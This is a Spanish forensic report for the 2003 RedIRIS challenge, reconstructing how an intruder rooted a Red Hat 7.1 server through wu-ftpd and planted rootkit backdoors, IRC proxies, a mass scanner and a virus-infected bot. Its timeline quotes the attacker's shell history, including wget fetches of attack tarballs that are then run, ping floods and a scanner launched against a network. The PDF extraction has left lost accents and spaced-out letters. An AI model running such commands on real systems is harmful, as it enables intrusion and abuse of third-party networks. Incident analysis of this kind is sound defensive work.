TU0.UT TURESUMEN EJECUTIVOUT ........................................................................................ 1 TU1.UT TUINTRODUCCINUT .................................................................................................... 3 TU2.UT TUENTORNO DE INVESTIGACINUT ........................................................................ 5 TU3.UT TUPROCESO DE ANLISISUT ....................................................................................... 7 TU4.UT TUCRONOGRAMA DE ACTIVIDADESUT................................................................... 9 TU5.UT TUANLISIS DE ARTEFACTOSUT .............................................................................. 20 TU5.1.UT TUFICHEROS BAJ O /VAR/FTP/NERODUT ....................................................................... 20 TU5.2.UT TUFICHEROS BAJ O /ROOT/.,UT .................................................................................... 25 TU5.3.UT TUFICHEROS BAJ O /VAR/TMP/.,UT ............................................................................... 30 TU5.4.UT TUFICHEROS BAJ O /BIN, /USR/BIN Y OTROS DIRECTORIOS DEL SISTEMAUT.................. 31 TU5.5.UT TURESUMEN DE LA ACTIVIDAD IRCUT ....................................................................... 38 TU6.UT TUDIRECCIONES IP IMPLICADASUT....................................................................... 39 TU7.UT TUCONCLUSIONESUT................................................................................................... 41 TU7.1.UT TUCONCLUSIN 1UT ................................................................................................... 41 TU7.2.UT TUCONCLUSIN 2UT ................................................................................................... 41 TU7.3.UT TUCONCLUSIN 3UT ................................................................................................... 42 TU7.4.UT TUCONCLUSIN 4UT ................................................................................................... 42 TU8.UT TUREFERENCIASUT ...................................................................................................... 43 TU9.UT TUANEXOSUT .................................................................................................................. 44 TU9.1.UT TUMAIL ENVIADO EN INSTALACIN DE NERODUT ....................................................... 44
Informe tcnico Reto de Anlisis Forense
Pg. 1 0. Resumen ejecutivo Este documento es el informe tcnico en respuesta al reto de anlisis forense lanzado por RedIRIS en colaboracin con otras empresas en Noviembre de 2003 a travs de su pgina web HTUhttp://www.rediris.es/cert/ped/retoUTH. El objetivo del mismo es el anlisis de un sistema Linux previamente atacado y comprometido. Para ello, como nica informacin, se proporcionaron las imgenes de las distintas particiones del sistema comprometido. Dichas imgenes fueron analizadas utilizando una combinacin de las siguientes herramientas:
The Sleuth Kit[3] Conjunto de herramientas de anlisis forense de libre distribucin. Autopsy[2] Interfaz grfico para The Sleuth Kit. Tambin de libre distribucin. VMWare[1] Aplicacin comercial que permite emular mquinas virtuales Intel x86. Red Hat Linux[9] Muchos de los comandos del sistema constituyen verdaderas herramientas de anlisis forense. Google[10] Buscador de informacin en la web.
Las evidencias encontradas indican que el incidente investigado puede resumirse de la siguiente manera: El sistema fue instalado y conectado a la red la tarde del mircoles 21 de agosto de 2002. Un atacante logr acceso como root al sistema explotando la vulnerabilidad CVE-2001-0550 (wu-ftpd glob) del demonio servidor de FTP "wu-ftpd". Esto sucedi el viernes 23 de agosto de 2002 a las 00:22:48 horas, poco ms de un da despus de su instalacin. A continuacin instal y ejecut parcialmente un paquete de programas denominado "nerod.tgz". Este grupo de programas constituan un "rootkit", destinado a la apertura de puertas traseras y la ocultacin de las actividades del intruso. Despus accedi al sistema utilizando una de sus puertas traseras, cerr el camino a otros atacantes que intentaran explotar la misma vulnerabilidad, e instal dos paquetes de programas bajo "/root/.,": psybnc y awu. El primero es un Informe tcnico Reto de Anlisis Forense
Pg. 2 conocido proxy de IRC que permite realizar conexiones IRC de forma annima y el segundo es un conjunto de programas que permiten el ataque automtico a multitud de sistemas con la vulnerabilidad de wu-ftpd. Finalmente, en una nueva conexin mediante una de sus puertas traseras, el intruso descarg e instal dos nuevos paquetes de programas, esta vez bajo "/var/.,": psybnc (una versin ms reciente) y emech (manu.tgz). El primero es otra versin del programa ya comentado, y el segundo es un cliente automtico de IRC (IRC bot). En paralelo, se registr cierta actividad de los proxies IRC instalados por el atacante. El mismo viernes 23 de agosto de 2002, desde las 12:33:15 hasta las 15:36:30 se realizaron, por parte de los administradores del sistema y en vivo, las copias de las particiones de disco del sistema para su posterior anlisis. El resto del presente informe detalla las evidencias encontradas, as como el proceso de anlisis seguido.
Informe tcnico Reto de Anlisis Forense
Pg. 3 1. Introduccin Este documento es la respuesta al reto de anlisis forense lanzado por RedIRIS en colaboracin con otras empresas en Noviembre de 2003 a travs de su pgina web HTUhttp://www.rediris.es/cert/ped/retoUTH. El objetivo del mismo es el anlisis de un sistema Linux previamente atacado y comprometido. Para ello como nica informacin se proporcionan las imgenes de las distintas particiones del sistema comprometido. Aunque la normativa del reto no expone el detalle de los objetivos a cubrir en el informe, s manifiesta como tres principales objetivos los siguientes: Quin ha realizado el ataque? Cmo se realizo el ataque? Qu hizo el atacante una vez dentro del sistema? En el presente informe se intenta contestar a dichas preguntas, pero manteniendo un orden tal que su contenido sea lo ms didctico posible. Asimismo, la limitacin de mantener el informe a un mximo de 60 pginas obliga a realizar una breve sntesis de todo el trabajo realizada. As pues, el esquema seguido para contestar al reto consta de los siguientes apartados:
Entorno de Investigacin El propsito de este captulo es detallar las herramientas empleadas en el anlisis, as como la construccin del entorno de anlisis forense usado para la investigacin. Proceso de anlisis En este apartado se detalla de forma resumida la secuencia de actividades llevada a cabo para la obtencin de las evidencias objeto del anlisis. Debido a la limitacin de espacio, su exposicin es muy sinttica, puesto que relatar en detalle todas y cada una de las acciones realizadas llevara aparejada mucha ms informacin. Cronograma de actividades El objeto de este captulo es mostrar todas las actividades realizadas por el (los) atacante(s) de una forma secuencial, desde el inicio de las mismas hasta la realizacin de las imgenes de las particiones. Se muestra as de un vistazo qu es lo que hizo, cundo lo hizo y la evidencia que soporta estos datos. Anlisis de artefactos En este captulo se analizan todos los ficheros creados en el sistema como consecuencia del ataque, indicando su objetivo y cualquier otro dato de inters relativo a los mismos. Informe tcnico Reto de Anlisis Forense
Pg. 4
Direcciones IP implicadas Se intenta aqu reflejar la informacin obtenida sobre las direcciones IP que de una u otra manera se han visto implicadas en el incidente, incluyendo la de quien quienes atacaron el sistema. Conclusiones Finalmente, este apartado aglutina los principales puntos que se obtienen como consecuencia del anlisis efectuado.
Informe tcnico Reto de Anlisis Forense
Pg. 5
2. Entorno de investigacin Para facilitar el anlisis del sistema facilitado en forma de imgenes de particiones, creamos varios entornos de trabajo empleando vmware workstation[1]. En primer lugar, en un disco instalamos Red Hat 9.0, junto con todas las herramientas de anlisis forense a emplear (autopsy, tct, dde, etc...). A continuacin, creamos un nuevo disco virtual de vmware de 4Gb y, con ayuda de fdisk, creamos una serie de particiones con exactamente- el mismo tamao que las imgenes obtenidas con dd proporcionadas en el reto. Finalmente, copiamos con dd las imgenes a estas particiones recin creadas. Con ello obtuvimos un disco virtual que contiene todos los datos del reto. La ventaja de crear un disco as es que, configurando la mquina virtual de vmware para acceder al mismo en modo no-persistente, podemos usar el mismo cuantas veces queramos despreocupndonos de la posibilidad de alterar accidentalmente la evidencia proporcionada. Adicionalmente, una ventaja no menor cuando se trabaja en equipo, es que la auto-compresin que vmware hace con sus discos virtuales hizo que el tamao terico de 4Gb tuviera cabida en un simple CD-ROM. En segundo lugar, tras determinar que el sistema original era un Red Hat 7.1 Server, decidimos crear un segundo sistema virtual vware con un RedHat 7.1 limpio que tuviera acceso al disco del reto, para poder de forma fcil comparar el sistema analizado con respecto a uno estndar. El disco imagen del reto no es arrancable, puesto que no tiene el sector de boot configurado. As pues, decidimos configurar ese sector adecuadamente y crear un tercer sistema virtual que nos permitiera hacer anlisis dinmico de los posibles binarios que encontrsemos en l. Para facilitar dicho anlisis, creamos un CD-ROM con las herramientas de anlisis (y la mayora de comandos ms usados de Linux) compiladas estticamente, y lo montamos en esta tercera mquina virtual. El esquema siguiente resume los tres sistemas virtuales creados: Informe tcnico Reto de Anlisis Forense
Pg. 6
Todos los discos virtuales (excepto en los casos en que ha sido necesario realizar algn cambio) son montados como no persistentes para evitar cualquier posibilidad de contaminacin de datos. Para compartir informacin con el sistema host (el PC real sobre el que se ejecuta vmware) , empleamos cuando es necesario los directorios compartidos (Shared Folders) de vmware. En el sistema de anlisis forense (Red Hat 9.0) incluimos tambin una copia de los ficheros con las imgenes de las particiones del sistema a analizar, de modo que Autopsy pudiera trabajar con ellos.
Re d Hat 9.0 +He rramie ntas Anlisis Fo re nse Re to Re dIris Re d Hat 7.1 Se rve r Re to Re dIris BOOTABLE Share d Fo lde r CD-ROM co n He rramie ntas Anlisis Informe tcnico Reto de Anlisis Forense
Pg. 7 3. Proceso de anlisis De forma resumida, el proceso empleado en el anlisis del sistema comprometido ha sido el siguiente: 1- Descargar las imgenes de las particiones desde HTUwww.rediris.esUTH y verificar el checksum md5 facilitado para todas ellas. 2- Configuracin del entorno de investigacin, tal y como se describe en el captulo anterior. Para ello fue necesario un primer montaje de las particiones para determinar que se trataba de un sistema Red Hat 7.1 y averiguar los paquetes instalados mediante el comando rpm q a --dbpath /iris/var/lib/rpm (donde /iris es el punto de montaje de las particiones en nuestro entorno vmware primario de investigacin) As ya fue posible instalar un sistema Red Hat 7.1 limpio con lo misma configuracin. 3- Ejecucin de autopsy sobre las particiones, creando un nuevo caso en Autopsy y dando de alta en l las imgenes del sistema a analizar. La siguiente figura muestra el aspecto de Autopsy ofreciendo las imgenes del sistema comprometido para su anlisis:
Con ello estamos ya en condiciones de obtener un cronograma bsico desde el punto de vista de sistema de ficheros sobre el que investigar. 4 Obtener una primera lista de los ficheros modificados, de varias formas: 4.1- Verificando la integridad de los paquetes rpm instalados, mediante el comando: rpm --verify a --root /iris Informe tcnico Reto de Anlisis Forense
Pg. 8 4.2- Buscando los ficheros borrados en el sistema con la ayuda de autopsy. 4.3- Obteniendo una lista de todos los ficheros en nuestro sistema RedHat 7.1 limpio con su checksum md5 y comparndola con una lista similar en el sistema objeto de anlisis. 5 Anlisis de los principales ficheros de log: /var/log/*, .bash_history, etc... 6 A partir de aqu, el trabajo se vuelve bastante manual. Es evidente que hay mucha actividad y cambios en el sistema que son normales y no corresponden a actividad de ataque alguna, como instalacin del sistema, escritura en ficheros de log, ejecucin de slocate desde cron, etc... que aade mucho ruido a las evidencias recogidas. Para el anlisis temporal hemos intentado verificar cualquier hiptesis desde varias fuentes. Por ejemplo, comprobando la consistencia entre los comandos que aparecen en /root/.bash_history y lo que indica el timeline generado por autopsy. En cuanto al anlisis de binarios y ficheros desconocidos, las herramientas que hemos usado han incluido: file, strings, objdump y grep para determinar el contenido de los mismos. strace, ltrace, gdb, para el anlisis dinmico de los binarios, ejecutndolos siempre en el entorno controlado vmware. y, en general, las tcnicas de anlisis descritas en HTUhttp://www.honeynet.org/reverse/index.htmlUTH
Finalmente, sealar que, como siempre, una de las mayores herramientas de ayuda a cualquier anlisis forense es HTUhttp://www.google.comUTH .
Informe tcnico Reto de Anlisis Forense
Pg. 9
4. Cronograma de actividades A continuacin se presenta, en forma de tabla, un sumario del cronograma de actividades detectadas en el sistema:
Periodo (Agosto 2002) Accin Evidencia Asociada Mircoles 21 20:15:46 a 20:56:20 Instalacin del sistema operativo (Red Hat 7.1)
Datos: El fichero /etc/redhat-release contiene la versin del sistema operativo:
# cat / mnt / r et o/ et c/ r edhat - r el ease Red Hat Li nux r el ease 7. 1 ( Seawol f ) #
Ese dato es corroborado por el fichero /var/log/dmesg, y por la lista de paquetes instalados en el sistema segn la base de datos de RPM. Ordenndolos por fecha de instalacin, se obtiene la franja horaria en la que se produjo la instalacin del sistema:
# r pm- qa - - dbpat h / mnt / r et o/ var / l i b/ r pm- - l ast wget - 1. 5. 3- 1 Fr i 23 Aug 2002 12: 25: 45 AM CEST zl i b- devel - 1. 1. 3- 22 Wed 21 Aug 2002 08: 56: 20 PM CEST ypser v- 1. 3. 11- 13 Wed 21 Aug 2002 08: 56: 18 PM CEST [ . . . ] i ndexht ml - 7. 1- 2 Wed 21 Aug 2002 08: 17: 43 PM CEST gl i bc- common- 2. 2. 2- 10 Wed 21 Aug 2002 08: 17: 39 PM CEST ghost scr i pt - f ont s- 5. 50- 3 Wed 21 Aug 2002 08: 15: 46 PM CEST #
El ltimo paquete instalado, wget-1.5.3-1, fue instalado a posteriori por un intruso, tal y como se muestra ms adelante.
La lista ordenada de accesos a ficheros del sistema, construida mediante la opcin "Timeline" de Autopsy, corrobora la franja horaria en la que se produjo la instalacin del sistema.
J ueves 22 (todo el da) El sistema recibe algunas conexiones a los servicios FTP y SSH, sin consecuencias. Por lo dems, actividad normal del sistema, correspondiente a los trabajos planificados mediante "cron".
Datos: Del fichero /var/log/messages:
Aug 22 08: 17: 25 l ocal host f t pd[ 6586] : FTP sessi on cl osed Aug 22 08: 24: 29 l ocal host f t pd[ 6589] : FTP sessi on cl osed
Aug 22 06: 26: 29 l ocal host f t pd[ 6590] : ANONYMOUS FTP LOGI N FROM Informe tcnico Reto de Anlisis Forense
Pg. 10 Periodo (Agosto 2002) Accin Evidencia Asociada 218. 146. 115. 18 [ 218. 146. 115. 18] , mozi l l a@ Aug 22 08: 30: 43 l ocal host f t pd[ 6595] : l ost connect i on t o a213- 84- 155- 131. adsl . xs4al l . nl [ 213. 84. 155. 131] Aug 22 08: 30: 43 l ocal host f t pd[ 6595] : FTP sessi on cl osed Aug 22 08: 31: 37 l ocal host f t pd[ 6596] : l ost connect i on t o a213- 84- 155- 131. adsl . xs4al l . nl [ 213. 84. 155. 131] Aug 22 08: 31: 37 l ocal host f t pd[ 6596] : FTP sessi on cl osed Aug 22 13: 12: 00 l ocal host f t pd[ 6733] : FTP sessi on cl osed Aug 22 23: 31: 01 l ocal host f t pd[ 7019] : FTP sessi on cl osed Aug 22 23: 37: 55 l ocal host f t pd[ 7020] : FTP sessi on cl osed Aug 23 00: 12: 15 l ocal host f t pd[ 7045] : FTP sessi on cl osed Aug 23 00: 19: 19 l ocal host f t pd[ 7046] : FTP sessi on cl osed
Del fichero /var/log/secure, adems de las conexiones FTP ya mostradas:
Aug 22 19: 16: 07 l ocal host sshd[ 6902] : Di d not r ecei ve i dent i f i cat i on st r i ng f r om195. 116. 20. 232. Aug 22 20: 16: 07 l ocal host sshd[ 649] : Gener at i ng new 768 bi t RSA key. Aug 22 20: 16: 08 l ocal host sshd[ 649] : RSA key gener at i on compl et e.
El resto de la actividad mostrada por el "Timeline" de Autopsy, se explica por los trabajos normales del sistema, ejecutados por cron (/etc/cron.hourly, /etc/cron.daily, /etc/cron.d)
Viernes 23 00:22:48 Un atacante remoto logra acceso como root al sistema explotando la vulnerabilidad CVE-2001-0550 (wu-ftpd glob) del demonio servidor de FTP "wu-ftpd". El atacante utiliza el exploit 7350wurm o una variacin del mismo, que proporciona una shell interactiva de root en el sistema atacado si ste es vulnerable. El ataque fue es lanzado desde la direccin IP 200.47.186.114.
Datos: El log del sistema /var/log/syslog, muestra unas conexiones FTP annimas desde la direccin IP 200.47.186.114 y a continuacin la parada del servicio de registro de mensajes del sistema (syslog). Por algn error en la aplicacin de las zonas horarias por parte del demonio wu-ftpd, la fecha y hora de los dos primeros mensajes estn desplazados dos horas en el tiempo: "Aug 22 22:21" corresponde en realidad a "Aug 23 00:21":
Aug 22 22: 21: 05 l ocal host f t pd[ 7049] : ANONYMOUS FTP LOGI N FROM 200. 47. 186. 114 [ 200. 47. 186. 114] , mozi l l a@ Aug 22 22: 22: 48 l ocal host f t pd[ 7052] : ANONYMOUS FTP LOGI N FROM 200. 47. 186. 114 [ 200. 47. 186. 114] , mozi l l a@ Aug 23 00: 25: 03 l ocal host ker nel : Ker nel l oggi ng ( pr oc) st opped. Aug 23 00: 25: 03 l ocal host ker nel : Ker nel l og daemon t er mi nat i ng. ago 23 00: 25: 04 l ocal host sysl og: kl ogd shut down succeeded Aug 23 00: 25: 04 l ocal host exi t i ng on si gnal 15
Obsrvese que la contrasea suministrada por el atacante en los Informe tcnico Reto de Anlisis Forense
Pg. 11 Periodo (Agosto 2002) Accin Evidencia Asociada accesos annimos a FTP: "mozilla@". Esto indica que probablemente utiliz el exploit de TESO (7350wurm) o alguna variacin el mismo, ya que ste utiliza el nombre de usuario "ftp" y la contrasea "mozilla@" para lograr acceso FTP annimo. Adems, una copia de ese exploit fue introducida posteriormente en el sistema por el atacante, en "/root/.,/aw/wu"TP 1 PT. El exploit, tanto una versin compilada como su cdigo fuente, estn disponibles en las siguientes direcciones:
El log /var/log/secure confirma estos accesos annimos y muestra una serie de escaneos previos desde la misma direccin IP:
Aug 23 00: 12: 13 l ocal host xi net d[ 812] : START: f t p pi d=7045 f r om=200. 47. 186. 114 Aug 23 00: 12: 15 l ocal host xi net d[ 812] : EXI T: f t p pi d=7045 dur at i on=2( sec) Aug 23 00: 19: 18 l ocal host xi net d[ 812] : START: f t p pi d=7046 f r om=200. 47. 186. 114 Aug 23 00: 19: 19 l ocal host xi net d[ 812] : EXI T: f t p pi d=7046 dur at i on=1( sec) Aug 23 00: 21: 04 l ocal host xi net d[ 812] : START: f t p pi d=7049 f r om=200. 47. 186. 114 Aug 23 00: 22: 47 l ocal host xi net d[ 812] : START: f t p pi d=7052 f r om=200. 47. 186. 114
La lista ordenada de accesos a ficheros del sistema, construida mediante la opcin "Timeline" de Autopsy, muestra los siguientes accesos durante ese tiempo:
Fr i Aug 23 2002 00: 22: 47 2132 m. c - / - r w- - - - - - - r oot / ssh r oot 12054 / var / l og/ secur e Fr i Aug 23 2002 00: 22: 48 4096 mac - / - r w- r - - r - - r oot / ssh r oot 38169 / var / r un/ f t p. r i ps- al l 168 . a. - / - r w- - - - - - - r oot / ssh r oot 28245 / et c/ f t puser s 104 . a. - / - r w- - - - - - - r oot / ssh r oot 28244 / et c/ f t phost s Fr i Aug 23 2002 00: 24: 19 544317 m. c - / - r w- r - - r - - r oot / ssh r oot 30143 / var / f t p/ ner od. t ar . gz
Ntese que tras el acceso annimo a FTP de las 00:22:48, enseguida aparece la creacin del fichero "/var/ftp/nerod.tar.gz", sin duda instalado por el intruso, como se describe en el siguiente tramo de este cronograma. Informacin detallada sobre el fichero puede encontrarse en la seccin "Anlisis de artefactos".
La vulnerabilidad, que fue publicada en abril de 2001, se describe en los siguientes boletines de seguridad:
TP 1 PT Vase seccin "anlisis de artefactos". Informe tcnico Reto de Anlisis Forense
Pg. 12 Periodo (Agosto 2002) Accin Evidencia Asociada
La direccin IP desde la cul se lanz el ataque, 200.47.186.114, carece de nombre asociado y pertenece a un proveedor de servicios de Internet localizado en Per (Uhttp://www.comsat.com.peU).TP 2 PT. La seccin "6 Direcciones IP implicadas" ofrece ms informacin sobre esta direccin IP.
Viernes 23 (omitido en adelante) 00:22:48 a 00:26:08 El intruso copia al sistema el fichero /var/ftp/nerod.tar.gz, lo descomprime y ejecuta el script de instalacin. Esto da lugar a todos los ficheros presentes en el sistema bajo /var/ftp/nerod, y que se analizan en profundidad en la seccin "Anlisis de artefactos".
En resumen se trata de un rootkit con diversas utilidades, que entre otras cosas instala un par de puertas traseras: aade el usuario "ssh" con UID 0, por tanto equivalente a root, instala un servidor SSH que no guarda ningn tipo de informacin de registro, escuchando en el puerto 1981, y una shell escuchando en el puerto 465 (smtps) que simula un servidor Sendmail. Informacin ms detallada en la seccin "Anlisis de artefactos".
No obstante, la ejecucin del script de instalacin es abortada a mitad de ejecucin, justo tras enviar un correo electrnico con informacin sobre el sistema a la direccin frumosu99us@yahoo.com. Posiblemente el atacante aborta la ejecucin pulsando CTRL-C al darse cuenta de que la instalacin enva correo a direcciones posiblemente no controladas por l.
Datos: Ese mail enviado, aunque fue borrado automticamente por el sistema tras su envo, es recuperable de la zona libre de disco de la particin /var, utilizando Autopsy. En la seccin final de este informe se puede encontrar un anexo con el contenido de dicho mensaje.
Tanto la descompresin del rootkit como la ejecucin de su script de instalacin y la interrupcin de dicha ejecucin en el punto indicado se confirman observando los accesos a ficheros registrados (Timeline de Autopsy).
TP 2 PT Tanto la ausencia de asociacin de nombre como la pertenencia de la direccin IP analizada al proveedor de servicios indicado, corresponden a la actualidad (diciembre 2003), dado que no existe un registro que permita conocer la trayectoria histrica de cada direccin IP, sino slo las asignaciones actuales. Informe tcnico Reto de Anlisis Forense
Pg. 13 Periodo (Agosto 2002) Accin Evidencia Asociada 00:27:09 a 00:27:31 Tras una pausa de 1 minuto, aade un usuario al sistema ("nerod") con su correspondiente contrasea, usando los comandos adduser y passwd.
Datos: En la particin de swap (Unit 352 (4096 bytes) in images/ 192.168.3.10- hda9.dd ) se puede encontrar el siguiente mensaje:
<38>Aug 23 00: 27: 09 adduser [ 7397] : new gr oup: name=ner od, gi d=501
Y el timeline de Autopsy muestra los siguientes accesos a ficheros:
Fr i Aug 23 2002 00: 27: 09 124 . a. - / - r w- r - - r - - r oot / ssh r oot 40166 / et c/ skel / . bashr c 747 mac - / - r w- r - - r - - ner od ner od 63365 / home/ ner od/ . emacs 224 mac - / - r w- r - - r - - ner od ner od 63363 / home/ ner od/ . bash_pr of i l e 400 m. . - r - - - - - - - - r oot / ssh r oot 28264 <192. 168. 3. 10- hda8. dd- dead- 28264> 124 mac - / - r w- r - - r - - ner od ner od 63364 / home/ ner od/ . bashr c [ . . . ] 4096 m. c d/ dr wx- - - - - - ner od ner od 63361 / home/ ner od 24 mac - / - r w- r - - r - - ner od ner od 63362 / home/ ner od/ . bash_l ogout 3728 . a. - / - r w- r - - r - - r oot / ssh r oot 40184 / et c/ skel / . scr eenr c 52348 . a. - / - r wxr - xr - x r oot / ssh r oot 159006 / usr / sbi n/ user add 96 . a. - / - r w- - - - - - - r oot / ssh r oot 40163 / et c/ def aul t / user add 7 . a. l / l r wxr wxr wx r oot / ssh r oot 158994 / usr / sbi n/ adduser - > user add [ . . . ] 13536 . a. - / - r - s- - x- - x r oot / ssh r oot 159701 / usr / bi n/ passwd 13137 . a. - / - r wxr - xr - x r oot / ssh r oot 6041 / l i b/ secur i t y/ pam_env. so 210 . a. - / - r w- r - - r - - r oot / ssh r oot 60254 / et c/ pam. d/ ot her 211 . a. - / - r w- r - - r - - r oot / ssh r oot 60256 / et c/ pam. d/ passwd [ . . . ] Fr i Aug 23 2002 00: 27: 13 1024 . a. - / - r w- r - - r - - r oot / ssh r oot 175310 / usr / l i b/ cr ackl i b_di ct . hwm Fr i Aug 23 2002 00: 27: 29 42116 . a. - / - r w- r - - r - - r oot / ssh r oot 175312 / usr / l i b/ cr ackl i b_di ct . pwi 828334 . a. - / - r w- r - - r - - r oot / ssh r oot 175311 / usr / l i b/ cr ackl i b_di ct . pwd Fr i Aug 23 2002 00: 27: 31 856 m. . - / - r w- - - - - - - r oot / ssh r oot 28261 / et c/ shadow- 1044 m. . - r w- r - - r - - r oot / ssh r oot 28265 <192. 168. 3. 10- hda8. dd- dead- 28265> 1044 m. . - / - r w- - - - - - - r oot / ssh r oot 28123 / et c/ passwd-
00: 56:20 a 00: 56:39 Tras una pausa de 30 minutos, el intruso vuelve a conectarse al sistema usando una de sus puertas traseras. Informe tcnico Reto de Anlisis Forense
Pg. 14 Periodo (Agosto 2002) Accin Evidencia Asociada
Crea el directorio "/root/.,".
Intenta descargar dos paquetes de herramientas deU www.geocities.comU, pero sin xito. Comete errores de tecleo (geocitites en vez de geocities).
Borra el usuario "ftp" del sistema, usando el comando "userdel". Adems, incluye los nombres de usuario "ftp", "anonymous" y "ssh" en el fichero /etc/ftpusers para que no se puedan utilizar para hacer conexiones FTP. De esta manera, no ser posible realizar conexiones FTP annimas al sistema y por tanto no ser posible aprovechar la vulnerabilidad de wu-ftpd sin conocer un nombre de usuario y su contraseaTP 3 PT.
Datos: La siguiente porcin de /root/.bash_history recoge esta actividad y se corresponde perfectamente con lo que se puede observar en los accesos a ficheros del timeline de Autopsy:
w mkdi r . , cd . , f t p f t p www. 0cat ch. com wget www. geoci t i t es. com/ neal a19/ psybnc2. 2. 2. t ar . gz wget www. geoci t i t es. com/ neal a19/ psybnc wget www. geoci t i es. com/ mast er 0n/ awu. t gz wget www. geoci t i es. com/ mast er 0n/ awu. t gz echo f t p >> / et c/ f t puser s echo anonymous >> / et c/ f t puser s echo ssh >> / et c/ f t puser s echo ssh >> / et c/ f t p echo ssh >> / et c/ ssh / usr / sbi n/ user del f t p
01:16:55 a 01:28:32
Tras una pausa de 20 minutos, el intruso copia, descomprime y ejecuta un nuevo paquete de software: /root/.,/psyBNC.tar.gz.
Se trata de un conocido proxy de IRC, que permite mantener conexiones de forma annima, entre otras funcionalidades. En el apartado "Anlisis de artefactos" se ofrece informacin ms detallada.
Nota: En realidad la pausa es de algo menos de 20 minutos, ya que hay que descontar el tiempo que durara la descarga del programa.
Datos: La siguiente porcin de /root/.bash_history recoge esta actividad y se corresponde perfectamente con lo que se puede observar en los accesos a ficheros del timeline de Autopsy:
wget www. geoci t i es. com/ gavi sh19/ psyBNC. t ar . gz f t p t ar zxvf psyBNC. t ar . gz
TP 3 PT Para explotar la vulnerabilidad de wu-ftpd glob es necesario autentificarse primero ante el servidor de FTP, aunque sea de manera annima. Informe tcnico Reto de Anlisis Forense
Pg. 15 Periodo (Agosto 2002) Accin Evidencia Asociada cd psybnc makew make . / psybnc
01:41:51 a 01:46:19
Tras una pausa de 13 minutos, el intruso copia, descomprime y ejecuta un nuevo paquete de software: /root/.,/awu.tgz. No obstante, antes de la descarga, comprueba cunto tiempo lleva arrancado el sistema (comando "uptime"), si hay alguien ms conectado al sistema (comando "w"), y la conectividad con la direccin IP 80.96.22.169 usando el comando "ping". Una vez instalado el paquete awu, el intruso se desconecta.
Se trata de un "scanner" que automatiza la intrusin en sistemas con wu-ftpd vulnerable. En el apartado "Anlisis de artefactos" se ofrece informacin ms detallada.
El intruso ejecut el programa "awu" contra la red "12.216.0.0/16" (comando "./awu 12.216) pero interrumpi su ejecucin al poco tiempo pulsando CTRL- C y abandon el sistema con exit.
Nota: En realidad la pausa es de algo menos de 13 minutos, ya que hay que descontar el tiempo que durara la descarga del programa.
Datos: La siguiente porcin de /root/.bash_history recoge esta actividad y se corresponde perfectamente con lo que se puede observar en los accesos a ficheros del timeline de Autopsy:
upt i me w pi ng - f - s6000 80. 96. 22. 169 pi ng - f - s6000 80. 96. 22. 169 l s cd . , l s wget www. geoci t i es. com/ mast er 0n/ awu. t gz t ar zxvf awu. t gz cd aw . / awu 12. 216 cexi t exi t
Adems, estos comandos tambin se pueden observar en la particin de swap del sistema analizado.
03:19:51 a 03:45:36 Tras una franja de dos horas sin actividad reflejada en los ltimos accesos ficheros, se observa actividad espordica de "psybnc". En la seccin "Resumen de la actividad IRC" se ofrecen detalles sobre esta actividad.
Datos: Timeline de Autopsy:
Fr i Aug 23 2002 03: 19: 51 0 mac - / - r w- - - - - - - r oot / ssh r oot 56292 / r oot / . , / psybnc/ l og/ USER2. TRL 1024 m. c d/ dr wxr wxr - x pepel u pepel u 56278 / r oot / . , / psybnc/ l og Fr i Aug 23 2002 03: 23: 56 1564 ma. - / - r w- - - - - - - r oot / ssh Informe tcnico Reto de Anlisis Forense
Pg. 16 Periodo (Agosto 2002) Accin Evidencia Asociada r oot 56293 / r oot / . , / psybnc/ mot d/ USER2. MOTD. ol d Fr i Aug 23 2002 03: 44: 38 1561 ma. - / - r w- - - - - - - r oot / ssh r oot 42362 / r oot / . , / psybnc/ psybnc. conf . ol d Fr i Aug 23 2002 03: 45: 36 286 . a. - / - r w- - - - - - - r oot / ssh r oot 42367 / r oot / . , / psybnc/ USER1. LOG
04:02:00 a 04:03:59 Actividad normal de cron.
Datos: Timeline de Autopsy.
09:11:17 a 09:50:42 De nuevo actividad espordica de "psybnc". En la seccin "Resumen de la actividad IRC" se ofrecen detalles sobre esta actividad.
Datos: Timeline de Autopsy.
10:17:03 a 10:20:42
Nueva sesin interactiva de un intruso.
Posiblemente se trate de un segundo intruso aprovechando alguna de las puertas traseras dejadas por el primer intruso, ya que en esta nueva sesin, quien fuera que estuviera conectado instal una segunda copia de "psybnc", en un directorio distinto: "/var/tmp/.,". Otra indicacin de que se tratara de personas distintas se obtiene al comparar los canales y "nicks" utilizados en las sesiones de IRC por ambas copias de psybnc, que resultan ser distintos. Sin embargo, la eleccin del nombre del directorio ".," indica que podra tratarse de la misma persona o alguien de su crculo.
Sea el mismo intruso o uno diferente, seguiremos refirindonos a l como "el intruso".
En esta ocasin, el intruso instala dos paquetes de programas: una nueva copia de psybnc ("psy.tgz"), como ya se ha comentado, y otro paquete llamado "manu.tgz".
Psybnc, como ya se ha indicado, se trata de un conocido proxy de IRC, que permite mantener conexiones de forma annima, entre otras funcionalidades.
El paquete "manu.tgz" contiene el programa "emech", que es un "IRC bot" (cliente automtico de IRC). El binario "emech" est renombrado a "httpd", probablemente para intentar pasar desapercibido con el nombre de un servidor web estndar. Este fichero est contaminado con el virus RST.b. La ejecucin de este programa provoc que se infectaran tambin mltiples programas del sistema bajo /usr/bin y la aparicin de los ficheros /dev/hdx1 y /dev/hdx2. En el apartado de referencias se ofrecen enlaces con informacin completa sobre este virus.
En el apartado "Anlisis de artefactos" se ofrece informacin ms detallada Informe tcnico Reto de Anlisis Forense
Pg. 17 Periodo (Agosto 2002) Accin Evidencia Asociada sobre ambos paquetes.
El archivo original conteniendo cada uno de los paquetes fue borrado por el intruso tras su instalacin, pero fue posible recuperar para su anlisis el paquete "manu.tgz", utilizando Autopsy.
NOTA: Con estos comandos finaliza el archivo /root/.bash_history, aunque su fecha de ltima modificacin sugiere que fue alterado dos horas despus. Este hecho se explica ms adelante.
Datos: La siguiente porcin de /root/.bash_history recoge esta actividad y se corresponde perfectamente con lo que se puede observar en los accesos a ficheros del timeline de Autopsy:
w cd / var / t mp mkdi r . , cd . , di r wget www. geoci t i es. com/ adr i anboy20r o/ psy. t gz t ar xvzf psy. t gz cd psybnc/ pi co psybnc. conf mv psybnc ht t pd bash cd . . di r r m- r f psy. t gz wget www. mumut zz. go. r o/ manu. t gz t ar xvzf manu. t gz cd emech/ di r pi co emech. user s bash cd . . di r r m- r f manu. t gz
Adems, estos comandos tambin se pueden observar en la particin de swap del sistema analizado.
10:22:19 a 10:46:12 Actividad espordica de psybnc bajo /var/tmp/.,/.
Datos: Timeline de Autopsy
